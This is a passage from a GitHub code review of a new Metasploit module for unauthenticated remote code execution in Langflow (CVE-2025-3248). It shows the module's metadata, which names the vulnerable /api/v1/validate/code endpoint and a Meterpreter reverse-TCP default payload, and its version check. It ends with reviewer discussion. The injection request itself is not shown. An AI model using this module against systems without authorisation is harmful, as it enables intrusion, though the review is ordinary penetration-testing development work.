modules/exploits/multi/http/langflow_unauth_rce_cve_2025_3248.rb

```diff
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI RCE',
+        'Description' => %q{
+          Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.
+          A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+        },
+        'Author' => [
+          'Naveen Sunkavally (Horizon3.ai)', # Vulnerability discovery and PoC
+          'Takahiro Yokoyama'                # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-3248'],
+          ['URL', 'https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/'],
+        ],
+        'Platform' => ['python'],
+        'Arch' => [ ARCH_PYTHON ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2025-04-09',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(7860),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+    })
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    json_version = res&.get_json_document&.fetch('version', nil)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless json_version
+
+    version = Rex::Version.new(json_version)
+    return Exploit::CheckCode::Unknown('Failed to get version.') unless version
+
+    # If authentication is not enabled, version 1.3.2 is vulnerable.
+    return Exploit::CheckCode.Detected("Version #{version} detected.") unless version < Rex::Version.new('1.3.0')
```

Comment:
This might be better?
```suggestion
    return Exploit::CheckCode.Appears("Version #{version} detected.") unless version < Rex::Version.new('1.3.0')
```

Reply:
I think adding a check for whether auto_load is enabled would be better. https://github.com/rapid7/metasploit-framework/pull/20022/commits/f67dfe6a626d3be035f464c266331c2ef68243e4 Thanks!

To disable automatic login and enforce user authentication, need to set LANGFLOW_AUTO_LOGIN=False in docker-compose.yml. By default, this variable is set to True. https://docs.langflow.org/configuration-authentication#langflow_auto_login
![image](https://github.com/user-attachments/assets/66dde747-60cb-48c9-a4eb-93fff9c35eef)